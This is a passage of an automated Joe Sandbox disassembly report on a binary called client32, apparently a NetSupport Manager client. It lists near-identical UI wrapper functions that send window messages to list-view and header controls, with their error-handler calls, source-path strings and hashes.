                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110151B6
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                                                    • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                                                                    • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                                                    • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110141B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,00001201,?,?), ref: 110141E1
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110141C3
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 110141BE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3507600817
                                                                                                                                    • Opcode ID: 2220ea4d4314ce11eb19b23b232e9ac23e65213a12c5755011ccedf5fcfbd85d
                                                                                                                                    • Instruction ID: e40b82f977eb721f415d7ce6a6c2c5c571fa6c694b71c8e0fe353644d2fc67f2
                                                                                                                                    • Opcode Fuzzy Hash: 2220ea4d4314ce11eb19b23b232e9ac23e65213a12c5755011ccedf5fcfbd85d
                                                                                                                                    • Instruction Fuzzy Hash: C6E0CD75A503187BD710DA81DC86FD7F39CDB54755F00C125FD2556640D670F950C790
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014230 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,00001204,?,?), ref: 11014261
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014243
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101423E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3507600817
                                                                                                                                    • Opcode ID: 4695f712f38e19e96030587a8b7603a3e15687e8071c6d8b407a0c9646f69055
                                                                                                                                    • Instruction ID: 55ae1fe25e9a5b1997f1acacac97235014ae2df67c49f839450db2036e8126b3
                                                                                                                                    • Opcode Fuzzy Hash: 4695f712f38e19e96030587a8b7603a3e15687e8071c6d8b407a0c9646f69055
                                                                                                                                    • Instruction Fuzzy Hash: DDE086796502187BD3109A81DC46ED6F39CDB44765F00C125F9255A240D670B8408790
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,0000101B,?,?), ref: 11014744
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014726
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11014721
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: 194154897d0380713e706b729317de2b6dfbb4a901c537dbd18d92fbe5febeee
                                                                                                                                    • Instruction ID: f4a04940886977a4d33c244523c4b49ee99724bc15382a3ab8aa458f91fd6d3d
                                                                                                                                    • Opcode Fuzzy Hash: 194154897d0380713e706b729317de2b6dfbb4a901c537dbd18d92fbe5febeee
                                                                                                                                    • Instruction Fuzzy Hash: 33E0CD75A003197BD310DA81DC86FD7F3ACEB45714F00C425F9595B641D6B0F940D790
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110147A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,0000101B,?,?), ref: 110147D4
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110147B6
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110147B1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: 53ab5b24a322073738cc7837381e228f776e543091f7fe03fc62bfe2f179107d
                                                                                                                                    • Instruction ID: dcea86e3b7d47b96aef4dcf1fe9bf2688f3b5c81ad1a1aa2d28696c08be52783
                                                                                                                                    • Opcode Fuzzy Hash: 53ab5b24a322073738cc7837381e228f776e543091f7fe03fc62bfe2f179107d
                                                                                                                                    • Instruction Fuzzy Hash: 24E08C76A0032ABBE324DA85EC86F97B7ACAB09714F004425F6199B241D6B0E94087A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014690 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,00001003,?,?), ref: 110146C4
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110146A6
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110146A1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: b254c516893a79caee912682a7ee43f650a1f84c7a6171d25e47667a09a8ed9c
                                                                                                                                    • Instruction ID: 8d0593330ada9686e3231cb0729b2e2fbcfcee1488ea721ae825490a659df4df
                                                                                                                                    • Opcode Fuzzy Hash: b254c516893a79caee912682a7ee43f650a1f84c7a6171d25e47667a09a8ed9c
                                                                                                                                    • Instruction Fuzzy Hash: AAE08675A00319BBD310DA81DC46FD7F39CEB49714F008425FD595A240D6B0B9408795
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,0000100C,?,?), ref: 11014955
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014936
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11014931
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: f2a3c0d3cfced7c5c3dda1661dbef33a0b6579604b8e1cd23a7edc71262f0a53
                                                                                                                                    • Instruction ID: 5c73e6f47182196294df00340f3bbabbb3f0f620b7ffee236a9f04ae72b4d4db
                                                                                                                                    • Opcode Fuzzy Hash: f2a3c0d3cfced7c5c3dda1661dbef33a0b6579604b8e1cd23a7edc71262f0a53
                                                                                                                                    • Instruction Fuzzy Hash: A8E0CD79A00369BBD3209A91DC46FFBF39CDB45765F00C426FD5956140E6B0F940C7A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110149A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,0000100D,?,?), ref: 110149D4
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110149B6
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110149B1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: ba6a96292a56ad6bbcf33101d68f0c546835ff46d84acf4b75f9693743b025fd
                                                                                                                                    • Instruction ID: f98ce014c3fd97d85dee2e1657fbd807c79f3d14d0710ef533e3743392f3b888
                                                                                                                                    • Opcode Fuzzy Hash: ba6a96292a56ad6bbcf33101d68f0c546835ff46d84acf4b75f9693743b025fd
                                                                                                                                    • Instruction Fuzzy Hash: D6E08675A00359BBD310DA81DC86FDBF39CDB45714F00C425F95956240D6B0B94087A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110141F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,00001205,00000000,?), ref: 1101421F
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014203
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 110141FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
